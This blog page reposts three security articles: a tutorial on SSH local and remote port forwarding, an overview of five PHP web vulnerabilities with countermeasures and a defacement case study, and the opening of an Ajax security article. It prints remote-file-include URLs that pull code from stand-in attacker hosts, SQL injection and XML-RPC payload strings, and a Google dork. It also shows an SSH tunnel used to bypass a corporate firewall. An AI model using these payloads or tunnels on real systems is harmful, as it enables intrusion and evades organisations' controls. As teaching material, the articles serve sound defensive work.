วันจันทร์ที่ 23 พฤศจิกายน พ.ศ. 2552

SSH Port Forwarding

Introduction
SSH is typically used for logging into remote servers so you have shell access to do maintenance, read your email, restart services, or whatever administration you require. SSH also offers some other native services, such as file copy (using scp and sftp) and remote command execution (using ssh with a command on the command line after the hostname).

Whenever we SSH from one machine to another, we establish a secure encrypted session. This first article in this SSH series[1] looked at properly verifying a server's host key, so that we can be sure that no attacker is able to perform a man-in-the-middle attack and gain access to read or manipulate what we do in that session. Other articles in this series looked at removing the need for static passwords using SSH user identities[2], and then using ssh-agent[3] to automate the task of typing passphrases.

SSH also has a wonderful feature called SSH Port Forwarding, sometimes called SSH Tunneling, which allows you to establish a secure SSH session and then tunnel arbitrary TCP connections through it. Tunnels can be created at any time, with almost no effort and no programming, which makes them very appealing. In this article we look at SSH Port Forwarding in detail, as it is a very useful but often misunderstood technology. SSH Port Forwarding can be used for secure communications in a myriad of different ways. Let's start with an example.

LocalForward Example
Say you have a mail client on your desktop, and currently use it to get your email from your mail server via POP, the Post Office Protocol, on port 110.[4] You may want to protect your POP connection for several reasons, such as keeping your password from going across the line in the clear[5], or just to make sure no one's sniffing the email you're downloading.

Normally, your mail client will establish a TCP connection to the mail server on port 110, supply your username and password, and download your email. You can try this yourself using telnet or nc on the command line:

xahria@desktop$ nc mailserver 110
+OK SuperDuper POP3 mail server (mailserver.my_isp.net) ready.
USER xahria
+OK
PASS twinnies
+OK User successfully logged on.
LIST
+OK 48 1420253
1 1689
2 1359
3 59905
...
47 3476
48 3925
.
QUIT
+OK SuperDuper POP3 mail server signing off.

xahria@desktop$

We can wrap this TCP connection inside an SSH session using SSH Port Forwarding. If you have SSH access to the machine that offers your service (POP, port 110 in this case) then SSH to it. If you don't, you can SSH to a server on the same network if the network is trusted. (See the security implications of port forwarding later in this article.)

In this case, let's assume we don't have SSH access to the mail server, but we can log into a shell server on the same network, and create a tunnel for our cleartext POP connection:

# first, show that nothing's listening on our local machine on port 9999:
xahria@desktop$ nc localhost 9999
Connection refused.

xahria@desktop$ ssh -L 9999:mailserver:110 shellserver
xahria@shellserver's password: ********

xahria@shellserver$ hostname
shellserver

From a different window on your desktop machine, connect to your local machine (localhost) on port 9999:

xahria@desktop$ nc localhost 9999
+OK SuperDuper POP3 mail server (mailserver.my_isp.net) ready.
USER xahria
+OK
PASS twinnies
...

Before we connected to the shellserver with SSH, nothing was listening on port 9999 on our desktop - once we'd logged in to the mail server with our tunnel, this port was bound by our SSH process, and the TCP connection to local port 9999 was magically tunneled through SSH to the other side.

Let's describe how this works in detail, using the example above.

* You launch the /usr/bin/ssh SSH client on the command line.
* The SSH client logs into the remote machine using whatever authentication method (password, Pubkey, etc) is available.
* The SSH client binds the local port you specified, port 9999, on the loopback interface, 127.0.0.1.
* You can do anything in your remote machine that you want -- tar up some files, write to some users, delete /etc/shadow... This interactive login is completely usable, or you can just let it hang around doing nothing.
* When a process connects to 127.0.0.1 on port 9999 on the client machine, the /usr/bin/ssh client program accepts the conection.
* The SSH client informs the server, over the encrypted channel, to create a connection to the destination, in this case mailserver port 110.
* The client takes any bits sent to this port (9999), sends them to the server inside the encrypted SSH session, who decrypts them and then sends them in the clear to the destination, port 110 of the mailserver.
* The server takes any bits received from the destination, mailserver's port 110, and sends them inside the SSH session back to the client, who decrypts and sends them in the clear to the process that connected to the client's bound port, port 9999.
* When the connection is closed by either endpoint, it is torn down inside the SSH session as well.

SSH Port Forward Debugging
Let's see it in action by using the verbose option to ssh:

xahria@desktop$ ssh -v -L 9999:mailserver:110 shellserver
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: Connecting to shellserver [296.62.257.251] port 22.
debug1: Connection established.
debug1: identity file /home/bri/.ssh/identity type 0
debug1: identity file /home/bri/.ssh/id_rsa type 1
debug1: identity file /home/bri/.ssh/id_dsa type 2
...
debug1: Next authentication method: password
xahria@shellserver's password: ********
debug1: Authentication succeeded (password).
debug1: Connections to local port 9999 forwarded to remote address localhost:110
debug1: Local forwarding listening on 127.0.0.1 port 9999.
debug1: channel 0: new [client-session]
debug1: Entering interactive session.
debug1: channel 0: request pty-req
debug1: channel 0: request shell
xahria@shellserver$

As you can see, there's a brief mention of port 9999 being bound and available for tunneling. We haven't made a connection to this port yet, so no tunnel is active yet. You can use the ~# escape sequence to see the connections in use. This sequence only works after a carriage return, so hit enter a few times before trying it:

xahria@shellserver$ (enter)
xahria@shellserver$ (enter)
xahria@shellserver$ (enter)
xahria@shellserver$ ~#
The following connections are open:
#1 client-session (t4 r0 i0/0 o0/0 fd 5/6)
xahria@shellserver$

You can see that there's only one connection, our actual SSH session from which we're typing those unix commands.

Now, in a different window if we do a telnet localhost 9999, we'll open up a new connection through the tunnel, and we can see it from our SSH session using ~#

xahria@shellserver$ (enter)
xahria@shellserver$ ~#
The following connections are open:
#1 client-session (t4 r0 i0/0 o0/0 fd 5/6)
#2 direct-tcpip: listening port 9999 for mailserver port 110,
connect from 127.0.0.1 port 42789 (t4 r1 i0/0
o0/0 fd 8/8)

You can see that now we have both the SSH session we're using, plus a tunnel, the second entry. It tells you all you need to know about the connection -- it came from our local machine (127.0.0.1) source port 42789, which we could look up with netstat or lsof output if we were curious about it.

RemoteForward Example
SSH Forwards actually come in two flavours. The one I've shown above is a local forward, where the ssh client machine is listening for new connections to be tunneled. A Remote Forward is just the opposite - a tunnel initiated on the server side that goes back through the client machine.

The classic example of using a Remote Forward goes something like this. You're at work, and the VPN access is going to be down for maintenance for the weekend. However you really have some important work to do, but you'd rather work from the comfort of your desk at home, rather than being stuck at work all weekend. There's no way for you to SSH to your work desktop because it's behind the firewall.

Before you leave for the evening, you SSH from your work desktop back to your home network. Your ~/.ssh/config file has the following snippet:

lainee@work$ tail ~/.ssh/config
Host home-with-tunnel
Hostname 204.225.288.29
RemoteForward 2222:localhost:22
User laineeboo



lainee@work$ ssh home-with-tunnel
laineeboo@204.225.228.29's password: ********

laineeboo@home$ ping -i 5 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=255 time=0.2 ms
...

We've set up a tunnel using the RemoteForward option in the SSH configuration file. (We could have set it up on the command line using the -R option if we'd prefered.) Just to make sure our firewall doesn't kill the connection for inactivity, we run a ping for grins. Then we head on home.

Later that evening, we can sit down on our home machine and see that we're logged in:

laineeboo@home$ last -1
laineeboo pts/18 firewall.my_work.com Tue Nov 23 22:28 still logged in

laineeboo@home$ ps -t pts/18
PID TTY TIME CMD
3794 pts/18 00:00:00 ksh
4027 pts/18 00:00:00 ping -i 5 127.0.0.1

Now comes the payoff - our tunnel is listening on our home machine on port 2222, and will be tunneled back through the corporate firewall to our work machine's port 22. So to SSH to work from home, since we have our tunnel ready, we simply point /usr/bin/ssh to port 2222:

laineboo@home$ ssh -p 2222 lainee@localhost
lainee@localhost's password: ********

lainee@work$

Success!
Port Forwarding Cheat Sheet
Remembering how to specify the kind of SSH Forward you want is sometimes tricky. Hopefully, the following table will make it a bit easier.

LocalForwards
Command Line Option -L local_listen_port:destination_host:destination_port
Configuration file entry LocalForward local_listen_port:destination_host:destination_port
local_listen_port is on SSH client loopback interface
destination_host is contacted from SSH server host

RemoteForwards
Command Line Option -R remote_listen_port:destination_host:destination_port
Configuration file entry RemoteForward remote_listen_port:destination_host:destination_port
remote_listen_port is on SSH server loopback interface
destination_host is contacted from SSH client host

Forwards can be confusing - we typically think of connections as being made up of four things - the local IP and port, and the remote IP and port. In the forward definition you create, you only have three things because the first port is always either the SSH client or server machine, and thus isn't specified.

Port Forward Security
Port forwards bind a port on either the ssh client (Local Forwards) or ssh server (Remote Forwards). With a default installation, the port will only be bound on the localhost interface, 127.0.0.1. This means that the tunnel is only available to someone on the machine where that port is listening.

In general, you don't want to allow other machines to contact your SSH tunnel so this is the correct setting. If you want to allow these ports to be available to any machine, then use one of the following:

Command line option Configuration file option
LocalForwards -g GatewayPorts yes
(in ~/.ssh/config or /etc/ssh/ssh_config)
RemoteForwards (none available) GatewayPorts yes
(in /etc/sshd_config)

The other important thing you must remember is that the data connection is only encrypted inside the SSH connection. If your destination_host you specify is not localhost[6] then the portion of the connection that extends out of the tunnel is not encrypted. For example if you used the the following:

desktop$ ssh -L 8080:www.example.com:80 somemachine

then any connection to localhost:8080 will be encrypted from your desktop through to somemachine, but it will be in cleartext from somemachine to www.example.com. If that fits your security model, no problem. But keep it in mind.

We'll see how you can put further limits on port forwards in a future article, such as rejecting or limiting them based on the SSH Pubkeys/Identity that is used for authentication.

NOTES:

[1] SSH Host Key Protection: http://www.securityfocus.com/infocus/1806

[2] SSH User Identities: http://www.securityfocus.com/infocus/1810

[3] SSH and ssh-agent: http://www.securityfocus.com/infocus/1812

[4] Some POP server software offers SSL-encrypted POP, by negotiating SSL using STARTTLS on port 110, or wrapped entirely in SSL on port 995. For this example, however, let's assume you have a non-SSL aware POP server.

[5] Some POP servers support alternate authentication methods, such as S/Key or challenge response, which can keep your password from going across the network.

[6] Unsniffable options would be localhost, 127.0.0.1 (or any 127/8 address on most unix-like systems) or any local IP address - these should all go through the local machine's TCP/IP stack without hitting the network card at all, and thus would be as secure as the network stack itself.

View more articles by Brian Hatch on SecurityFocus.

Comments or reprint requests can be sent to the editor.


SecurityFocus accepts Infocus article submissions from members of the security community. Articles are published based on outstanding merit and level of technical detail. Full submission guidelines can be found at http://www.securityfocus.com/static/submissions.html.

Five common Web application vulnerabilities

1. Introduction

"No language can prevent insecure code, although there are language features which could aid or hinder a security-conscious developer."
-Chris Shiflett

This article looks at five common Web application attacks, primarily for PHP applications, and then presents a case study of a vulnerable Website that was found through Google and easily exploited. Each of the attacks we'll cover are part of a wide field of study, and readers are advised to follow the references listed in each section for further reading. It is important for Web developers and administrators to have a thorough knowledge of these attacks. It should also be noted that that Web applications can be subjected to many more attacks than just those listed here.

While most of the illustrated examples in this article will discuss PHP coding due to its overwhelming popularity on the Web, the concepts also apply to any programming language. The attacks explained in this article are:

1. Remote code execution
2. SQL injection
3. Format string vulnerabilities
4. Cross Site Scripting (XSS)
5. Username enumeration

Considering the somewhat poor programming approach which leads to these attacks, the article provides some real examples of popular products that have had these same vulnerabilities in the past. Some countermeasures are offered with each example to help prevent future vulnerabilities and subsequent attacks.

This article integrates some of the critical points found in a number of whitepapers and articles on common Web application vulnerabilities. The goal is to provide an overview of these problems within one short article.
2. Vulnerabilities
2.1 Remote code execution
As the name suggests, this vulnerability allows an attacker to run arbitrary, system level code on the vulnerable server and retrieve any desired information contained therein. Improper coding errors lead to this vulnerability.

At times, it is difficult to discover this vulnerability during penetration testing assignments but such problems are often revealed while doing a source code review. However, when testing Web applications is is important to remember that exploitation of this vulnerability can lead to total system compromise with the same rights as the Web server itself.

Rating: rating4Highly Critical

Previously vulnerable products:
phpbb, Invision Board, Cpanel, Paypal cart, Drupal, and many others

Here we will look at two such types of critical vulnerabilities:

1. Exploiting register_globals in PHP: Register_globals is a PHP setting that controls the availability of "superglobal" variables in a PHP script (such as data posted from a user's form, URL-encoded data, or data from cookies). In earlier releases of PHP, register_globals was set to "on" by default, which made a developer's life easier - but this lead to less secure coding and was widely exploited. When register_globals is set to "on" in php.ini, it can allow a user to initialize several previously uninitialized variables remotely. Many a times an uninitialized parameter is used to include unwanted files from an attacker, and this could lead to the execution of arbitrary files from local/remote locations. For example:

require ($page . ".php");

Here if the $page parameter is not initialized and if register_globals is set to "on," the server will be vulnerable to remote code execution by including any arbitrary file in the $page parameter. Now let's look at the exploit code:

http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt

In this way, the file "http://www.attacker.com/attack.txt" will be included and executed on the server. It is a very simple but effective attack.
2. XMLRPC for PHP vulnerabilities: Another common vulnerability seen under this category of includes vulnerabilities with XML-RPC applications in PHP.

XML-RPC is a specification and a set of implementations that allow software running on disparate operating systems and in different environments to make procedure calls over the Internet. It is commonly used in large enterprises and Web environments. XML-RPC uses HTTP for its transport protocol and XML for data encoding. Several independent implementations of XML-RPC exist for PHP applications.

A common flaw is in the way that several XML-RPC PHP implementations pass unsanitized user input to the eval() function within the XML-RPC server. It results in a vulnerability that could allow a remote attacker to execute code on a vulnerable system. An attacker with the ability to upload a crafted XML file could insert PHP code that would then be executed by the Web application that is using the vulnerable XML-RPC code.

Here is a sample malicious XML file:



test.method


','')); phpinfo(); exit;/*




The above XML file, when posted to the vulnerable server, will cause the phpinfo() function call to be executed on the vulnerable server, in this case a simple example that reveals various details about the PHP installation.

Here is a list of software which have previously possessed this style of bug:
Drupal, Wordpress, Xoops, PostNuke, phpMyFaq, and many others

Countermeasures:

1. More recent PHP versions have register_globals set to off by default, however some users will change the default setting for applications that require it. This register can be set to "on" or "off" either in a php.ini file or in a .htaccess file. The variable should be properly initialized if this register is set to "on." Administrators who are unsure should question application developers who insist on using register_globals.
2. It is an absolute must to sanitize all user input before processing it. As far as possible, avoid using shell commands. However, if they are required, ensure that only filtered data is used to construct the string to be executed and make sure to escape the output.

References:

1. Using register_globals on php.net
2. Changes to register_globals in prior versions of PHP
3. Another PHP XMLRPC remote code execution example
4. CERT advisory on PHP XML-RPC vulnerabilities
5. File inclusion vulnerability in PayPal Store Front
6. Essential PHP Security, published by O'Reilly

2.2 SQL Injection
SQL injection is a very old approach but it's still popular among attackers. This technique allows an attacker to retrieve crucial information from a Web server's database. Depending on the application's security measures, the impact of this attack can vary from basic information disclosure to remote code execution and total system compromise.

Rating: rating4 Moderate to Highly Critical

Previously vulnerable products:
PHPNuke, MyBB, Mambo CMS, ZenCart, osCommerce

Covering SQL injection attacks in exhaustive detail is beyond the scope of this article, but below are a few good links in the references section which will help you to better understand this technique. This attack applies to any database, but from an attacker's perspective there are a few "favorites."

MS SQL has the feature of an extended stored procedure call, which allows any system level command to be executed via the MS SQL server – such as adding a user. Also, the error messages displayed by the MS SQL server reveals more information than a comparable MySQL server. While MS SQL server is not especially prone to a SQL injection attacks, there are security measures which should be implemented to make it secure and not allow the SQL server to give out critical system information.

Here is an example of vulnerable code in which the user-supplied input is directly used in a SQL query:


Name:



$query = "SELECT * FROM users WHERE username = '{$_POST['username']}";
$result = mysql_query($query);
?>

The script will work normally when the username doesn't contain any malicious characters. In other words, when submitting a non-malicious username (steve) the query becomes:

$query = "SELECT * FROM users WHERE username = 'steve'";

However, a malicious SQL injection query will result in the following attempt:

$query = "SELECT * FROM users WHERE username = '' or '1=1'";

As the "or" condition is always true, the mysql_query function returns records from the database. A similar example, using AND and a SQL command to generate a specific error message, is shown in the URL below in Figure 1.

Figure 1. Error message displaying the MS SQL server version.

It is obvious that these error messages help an attacker to get a hold of the information which they are looking for (such as the database name, table name, usernames, password hashes etc). Thus displaying customized error messages may be a good workaround for this problem, however, there is another attack technique known as Blind SQL Injection where the attacker is still able to perform a SQL injection even when the application does not reveal any database server error message containing useful information for the attacker.

Countermeasures:

1. Avoid connecting to the database as a superuser or as the database owner. Always use customized database users with the bare minimum required privileges required to perform the assigned task.
2. If the PHP magic_quotes_gpc function is on, then all the POST, GET, COOKIE data is escaped automatically.
3. PHP has two functions for MySQL that sanitize user input: addslashes (an older approach) and mysql_real_escape_string (the recommended method). This function comes from PHP >= 4.3.0, so you should check first if this function exists and that you're running the latest version of PHP 4 or 5. MySQL_real_escape_string prepends backslashes to the following characters: \x00, \n, \r, \, ', "and \x1a.

References for standard SQL Injection:

1. Steve's SQL Injection attack examples
2. SQL Injection Whitepaper (PDF)
3. Advanced SQL Injection paper

Blind SQL Injection:

1. SPI Dynamics blind SQL Injection paper (PDF)
2. iMperva blind SQL Injection article

2.3 Format String Vulnerabilities
This vulnerability results from the use of unfiltered user input as the format string parameter in certain Perl or C functions that perform formatting, such as C's printf().

A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted. This is assuming that the corresponding argument exists and is of type int * .

Format string vulnerability attacks fall into three general categories: denial of service, reading and writing.

Rating: rating3 Moderate to Highly Critical

Previously vulnerable products:
McAfee AV, Usermin, Webmin, various Apache modules, winRar, ettercap, and others.

* Denial-of-service attacks that use format string vulnerabilities are characterized by utilizing multiple instances of the %s format specifier, used to read data off of the stack until the program attempts to read data from an illegal address, which will cause the program to crash.
* Reading attacks use the %x format specifier to print sections of memory that the user does not normally have access to.
* Writing attacks use the %d, %u or %x format specifiers to overwrite the instruction pointer and force execution of user-supplied shell code.

Here is the piece of code in miniserv.pl which was the cause of a vulnerability in Webmin:

if ($use_syslog && !$validated)
{
syslog("crit",
($nonexist ? "Non-existent" :
$expired ? "Expired" : "Invalid").
" login as $authuser from $acpthost");
}

In this example, the user supplied data is within the format specification of the syslog call.

The vectors for a simple DoS (Denial of Service) of the Web server are to use the %n and %0(large number)d inside of the username parameter, with the former causing a write protection fault within Perl – and leading to script abortion. The latter causes a large amount of memory to be allocated inside of the perl process.

A detailed Webmin advisory that was used for this example is available and provides more information.

Countermeasure:

Edit the source code so that the input is properly verified.

References:

1. tiny FAQ
2. Wiki definition

2.4 Cross Site Scripting
The success of this attack requires the victim to execute a malicious URL which may be crafted in such a manner to appear to be legitimate at first look. When visiting such a crafted URL, an attacker can effectively execute something malicious in the victim's browser. Some malicious Javascript, for example, will be run in the context of the web site which possesses the XSS bug.

Rating: rating2 Less to Moderately Critical

Previously vulnerable products:
Microsoft IIS web server, Yahoo Mail, Squirrel Mail, Google search.

Cross Site Scripting is generally made possible where the user's input is displayed. The following are the popular targets:

1. On a search engine that returns 'n' matches found for your '$_search' keyword.
2. Within discussion forums that allow script tags, which can lead to a permanent XSS bug.
3. On login pages that return an error message for an incorrect login along with the login entered.

Additionally, allowing an attacker to execute arbitrary Javascript on the victim's browser can also allow an attacker to steal victim's cookie and then hijack his session.



Here is a sample piece of code which is vulnerable to XSS attack:


Welcome!!

Enter your name:





echo "

Your Name
";
echo ($_GET[name_1]);

?>

In this example, the value passed to the variable 'name_1' is not sanitized before echoing it back to the user. This can be exploited to execute any arbitrary script.

Here is some example exploit code:

http://victim_site/clean.php?name_1=
or
http://victim_site/clean.php?name_1=

Countermeasures

The above code can be edited in the following manner to avoid XSS attacks:


$html= htmlentities($_GET['name_1'],ENT_QUOTES, 'UTF-8');
echo "

Your Name
";
echo ($html);
?>

References:

1. htmlentities on php.net
2. SPI Dynamics XSS article
3. Essential PHP Security published by O'Reilly

2.5 Username enumeration
Username enumeration is a type of attack where the backend validation script tells the attacker if the supplied username is correct or not. Exploiting this vulnerability helps the attacker to experiment with different usernames and determine valid ones with the help of these different error messages.

Rating: rating1 Less Critical

Previously vulnerable products:
Nortel Contivity VPN client, Juniper Netscreen VPN, Cisco IOS [telnet].

Figure 2 shows an example login screen:


Figure 2. Sample login screen.

Figure 3 shows the response given when a valid username is guessed correctly:


Figure 3. Valid username with incorrect password.

Username enumeration can help an attacker who attempts to use some trivial usernames with easily guessable passwords, such as test/test, admin/admin, guest/guest, and so on. These accounts are often created by developers for testing purposes, and many times the accounts are never disabled or the developer forgets to change the password.

During pen testing assignments, the authors of this article have found such accounts are not only common and have easily guessable passwords, but at times they also contain sensitive information like valid credit card numbers, passport numbers, and so on. Needless to say, these could be crucial details for social engineering attacks.

Countermeasures:

Display consistent error messages to prevent disclosure of valid usernames. Make sure if trivial accounts have been created for testing purposes that their passwords are either not trivial or these accounts are absolutely removed after testing is over - and before the application is put online.
3. Case study: notice Google's power
Most incidents such as Web site defacement or other basic hacking activity are done by people (often referred to as 'script kiddies') to gain recognition among their peers - and not really to gain any valuable information like credit cards. In this part of the article, we will look at one real-life example the authors have faced in their role as penetration testers.

One day we received a call from software company XYZ in Asia-Pacific. Their Website has been defaced. The main Website displayed a message saying that the site had been hacked by somebody in Holland. But the questions buzzing in everyone's mind were:

1. Why would somebody in Holland be interested in this Website? What could the attacker gain by hacking into it? There was no critical information on the server which would benefit an attacker, certainly no credit card information. After a detailed analysis it was concluded the attack was probably done for more fun and not really for profit.
2. Most importantly, how did the hacker break in?

The site which was defaced had been running a vulnerable version of a popular e-commerce software package. The vulnerability in this software allowed an attacker to include a remote file, thereby allowing the execution of any arbitrary code within the context of the Web server's privileges. Here is the snippet of code which caused this vulnerability:

if (!defined($include_file . '__')) {
define($include_file . '__', 1);
include($include_file);
}
?>

Exploiting this vulnerability is very trivial. All the attacker did to exploit this was to include, in the URL, a remote file having the malicious code which he wanted to execute:

http://vulnerable_server/includes/include_once.php?
include_file=https://attackersite.com/exploit.txt (note: all on one line)

The attacker could then run any arbitrary code on the vulnerable server through this exploit.txt file, for example:



The above code will print the source code of application.php file.

The question which needs considered here is, how did the attacker first reach this site? And how did he know that the victim is using a vulnerable version of this software? Well, a Google search for "inurl:/includes/include_once.php" lists all the web sites using this vulnerable product, and it's a cakewalk from there. Once found, the attacker's job was then simply to run the same exploit on any or all of the Websites that Google returned, and soon they would all be compromised.

Thus we see here that the attacker can easily reach a Website that uses vulnerable software through "Google dorks." In most of these cases, exploit code is readily available to the public through mailing lists, vulnerability reporting websites, and elsewhere. Therefore it becomes very trivial for the attacker to exploit known vulnerabilities in any Web application. It is not only the vendor's responsibility to release a patch as soon as the vulnerability is discovered, but also Website operators deploying software need to keep themselves updated with the security issues discovered in all the software packages they have deployed. Even if the application is not in use, if the files still exist on the server the server may still be vulnerable.
4. Defense-in-depth
This article has rightly focused on the source of Web vulnerabilities – the applications themselves. The application code is always the first place to secure a Web application. But there are also additional, defense-in-depth methods that can add additional layers of protection.

Once the Web server is hardened and the application is quality tested to be secure, additional layers will still help improve one's security posture. One approach using open-source software would be to use the mod_security Apache module with a modified Snort ruleset on the Web server itself, CHROOT Apache, provide file integrity monitoring of the Web server files using AIDE, and then add Snort as either a HIDS or NIDS. With regularly updated rulesets and an administrator who actively reads his logs, this provides an effective additional layer of defense. Of course, commercial alternatives to each of these technologies is also available. However, step number one is to first make the Web application secure.
5. Conclusion
In this article we've demonstrated five common web application vulnerabilities, their countermeasures and their criticality. If there is a consistent message among each of these attacks, the key to mitigate these vulnerabilities is to sanitize user's input before processing it. Through the case study we tried to connect standard Google hacking with these vulnerabilities and show how the attackers use the approaches together to reach to sites with vulnerable products and then hack and deface them.
About the Authors
Sumit Siddharth, GCIA, and Pratiksha Doshi are both penetration testers at NII Consulting, which specializes in pen-tests, security audits, compliance and forensics.

SecurityFocus accepts Infocus article submissions from members of the security community. Articles are published based on outstanding merit and level of technical detail. Full submission guidelines can be found at http://www.securityfocus.com/static/submissions.html.

Ajax Security Basics

Ajax Security Basics
Jaswinder S. Hayre, CISSP, and Jayasankar Kelath, CISSP 2006-06-19

Editor's note: Article first published 2006-06-19; updated 2006-06-22. Added several additional references that were mistakenly omitted by the authors, plus a new section on sources for further reading.
1. Introduction

Ajax technologies have been very visible on the web over the past year, due to their interactive nature. Google Suggest and Google Maps [ref 1] are some of the notable early adopters of Ajax. Companies are now thinking of how they too can leverage it, web developers are trying to learn it, security professionals are thinking of how to secure it, and penetration testers are thinking of how to hack it. Any technology that can improve the throughput of servers, produce more fluid page transitions, and make web application even richer for the end user is bound to find a place in the industry.

Ajax is considered the next step in a progression towards the trumpeted, "Web 2.0." The purpose of this article is to introduce some of the security implications with modern Ajax web technologies. Though Ajax applications can be more difficult to test, security professionals already have most of relevant approaches and tools needed. The authors will discuss if today's popular need to say goodbye to the full webpage refreshes using Ajax also means we are saying hello to some new security holes. We will begin with a brief discussion of the technology behind Ajax followed by a discussion on the security impact of applications using Ajax technology.
2. Ajax Primer

Regular web applications work on a synchronous model, where one web request is followed by a response that causes some action in the presentation layer. For example, clicking a link or the submit button makes a request to the web server with the relevant parameters. This traditional "click and wait" behavior limits the interactivity of the application. This problem has been mitigated by the use of Ajax (Asychronous Javascript and XML) technologies. For the purposes of this article, we will define Ajax as the method by which asynchronous calls are made to web servers without causing a full refresh of the webpage. This kind of interaction is made possible by three different components: a client-side scripting language, the XmlHttpRequest (XHR) object and XML.

Let's briefly discuss these components individually. A client-side scripting language is used to initiate calls to the server and then used to programmatically access and update the DOM within the client's browser, in response to the request. The most popular choice on the client is JavaScript because of its ubiquitous adoption by well-known browsers. The second component is the XHR object, which is really the heart of it all. Languages such as JavaScript use the XHR object to send requests to the web server behind the scenes, using HTTP as the transport medium. Then we have the third component, the use of which isn't necessarily set in stone: XML is the data format for messages being exchanged.

Many sites use JSON (JavaScript Object Notation) in place of XML because it's easier to parse and it has less overhead. When using JavaScript to parse JSON, it's as simple as passing it to the eval() function. On the other hand, one might use XPath to parse the returned XML. Also, there are many "Ajax sites" out there which don't use XML or JSON at all, and instead just send snippets of plain old HTML which are dynamically inserted into the page.

As it turns out, Ajax isn't a brand new technology but instead a combination of existing technologies used together to develop highly interactive web applications. In reality, all these components have been around for a number of years, marked by many with the release of Internet Explorer 5.0. Developers have found many uses for Ajax such as "suggestive" textboxes (such as Google Suggest) and auto-refreshing data lists. All XHR requests are still processed by typical server side frameworks, such as the standard options like J2EE, .NET and PHP. The asynchronous nature of Ajax applications is illustrated below in Figure 1.

Figure 1.
Figure 1. An Ajax sequence is asynchronous.
3. Security implications with Ajax

Now that we have reviewed the basics of Ajax, let's discuss its security implications. Ajax does not inherently introduce new security vulnerabilities in the realm of web applications. Instead, the applications face the same security issues as classic web applications. Unfortunately, common Ajax best practices have not been developed, which leaves plenty of room to get things wrong. This includes proper authentication, authorization, access control and input validation. [ref 2] Some potential areas of concern involving the use of Ajax include the following:

* Client-side security controls

Some might argue that the dependence on client side programming opens up the possibility of bringing some already well-known problems back into the forefront. [ref 2] One such possibility relates to developers improperly implementing security through client-side controls. As we discussed in the previous section, the use of Ajax requires quite a bit of client-side scripting code. Web developers are now writing both the server-side and client-side code, so this might attract developers towards implementing security controls on the client-side. This approach is horribly insecure because attackers can modify any code running on their client computer when testing the application for vulnerabilities. Security controls should either be completely implemented on the server or always re-enforced on the server.

* Increased attack surface

A second challenge relates to the difficulty involved in securing the increased attack surface. Ajax inevitably increases the overall complexity of the system. In the process of adopting Ajax, developers could code a great number of server-side pages, each page performing some tiny function (such as looking up a zip code for auto completing a user's city and state fields) in the overall application. These small pages will each be an additional target for attackers, and thus an additional point which needs to be secured to ensure a new vulnerability has not been introduced. This is analogous to the well known security concept of multiple point of entry into a house: the difficulty involved in securing a house with one door as compared to securing one with ten doors.

* Bridging the gap between users and services

Ajax is a method by which developers bring end users closer to interfaces being exposed by Service Oriented Architectures. [ref 3]The push to create loosely coupled service-based architectures is a promising idea with many benefits in enterprise environments. As more of these service-based "endpoints" become developed, and as Ajax introduces the ability to push more sophisticated processing to the end user, the possibility of moving away from the standard three-tier model arises.

Typically, many web services within an enterprise (as opposed to on the Internet overall) were designed for B2B, and therefore designers and developers often did not expect interaction with actual users. This lack of foresight lead to some bad security assumptions during design. For example, the initial designers may have assumed that authentication, authorization and input validation would be performed by other middle tier systems. Once one allows "outsiders" to directly call these services through the use of Ajax, an unexpected agent is introduced into the picture. A real-life example of such usage is the consistent pitch from Microsoft to use Atlas [ref 4] hand-in-hand with web services. Developers can now write JavaScript to create XML input and call the web service right from within the client's browser. In the past this was achieved through service proxies at the server.

* New possibilities for Cross-Site Scripting (XSS)

Another unfortunate truth is that attackers can be more creative (in other words, dangerous) with the use of Cross Site Scripting (XSS) vulnerabilities. [ref 5] Typically, attackers had to use XSS holes in a "single-threaded" world, where the attack was being carried out while the user's browser was in a wait state. This wait state provided some visual/behavioral cues to the user of a possibly misbehaving application. With the introduction of Ajax, an attacker can exploit Cross Site Scripting vulnerabilities in a more surreptitious manner. While you check your mail with an Ajax-enabled application, the malicious code could be sending email to all your friends without your browser giving you any visual cues at all.

Adequate, specialized security testing must be performed prior to moving the application into production to address these areas of concern. Even though Ajax applications are web applications, an organization's existing security testing methodologies may be insufficient due to the highly interactive nature of these applications.
4. How Ajax Complicates Current Security Testing Methodology

While testing a regular web application, a penetration tester starts by footprinting the application. The intent of the footprint phase is to capture the requests and responses so that the tester understands how the application communicates with the server and the responses it receives. The information is logged through local proxies such as Burp [ref 6] or Paros [ref 7]. It is important to be as complete as possible during the footprint phase so that the tester logs requests to all pages used by the application.

After that step, the tester will start the process of methodical fault injection, either manually or using automated tools, to test parameters that are passed to and from the web server.

Ajax complicates this methodology because of its asynchronous nature. Ajax applications are typically noisier when compared to regular web applications. An application may make multiple requests in the background even when it appears to be static to a user. A tester has to be aware of several situations which might cause difficulties with the application testing process. These include:

* The issue of "state"

In the regular web application world, the state of the application has been fairly well defined. Everything residing in the DOM for a page could be considered as the current state of the page. If the state needs to change, a request was sent to the server and the response defined how the state changed.

In the Ajax world, things can change much more subtly. The application can potentially generate different types of requests depending on the current state of the page. The request generated by clicking on a list box may be different from the request generated by clicking on the same list box if the user has first select a radio button on the page. Additionally, the response can update part of a page so that the user may now have new links or new controls to interact with on that page. During security testing, this behavior is of concern because it is much more difficult to determine if the tester has seen all possible types of requests that can be generated by a page or application. [ref 8]

* Requests initiated through timer events

This refers to updates to the user interface without any user interaction, through timer-based events. Applications may periodically send requests to the server to update information on the web page. For example, a financial application may use the XHR object to update parts of the web page that display current stock market information. The tester may not be aware of this process happening in the background if they do not catch the request at the right time, since there may not be visible links or buttons to suggest to the tester that there are requests being made in the background.

* Dynamic DOM updates

Ajax responses can contain JavaScript snippets that can be evaluated by the web application and presented at the user interface. This might include new links, access to new documents on the server, and so on. One way to achieve this is by using the eval() statement. [ref 2, ref 8] The eval() statement takes a single parameter, a string, and executes it as if it were a part of the program.

